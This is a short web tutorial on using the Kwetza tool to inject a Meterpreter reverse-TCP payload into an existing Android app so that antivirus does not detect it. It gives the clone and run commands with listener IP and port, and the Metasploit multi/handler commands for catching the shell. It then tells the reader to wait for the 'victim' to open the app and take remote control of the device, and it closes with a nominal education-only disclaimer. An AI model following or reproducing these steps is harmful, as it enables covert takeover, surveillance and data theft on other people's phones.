Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.
Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application’s default permissions or inject additional permissions to gain additional functionality.
Download Kwetza from Github
git clone https://github.com/sensepost/kwetza.git
To run Kwetza
cd kwetza python kwetza.py test.apk tcp 192.168.x.x 4444 yes
After that, Open a new terminal and open metasploit, by using following command
msfconsole use exploit multi/handler set payload android/meterpreter/reverse_tcp set LHOST (i.e. your IP) set LPORT (i.e. enter that port no. at the time of creating payload) exploit -j
Wait for the victim will open/execute that file and you will get remote access of the victim device. For better understanding watch the step by step video tutorial given below.
Watch Step By Step Video On Youtube
“This tutorial is strictly for Education purpose, We are not responsible for any kind of damage.”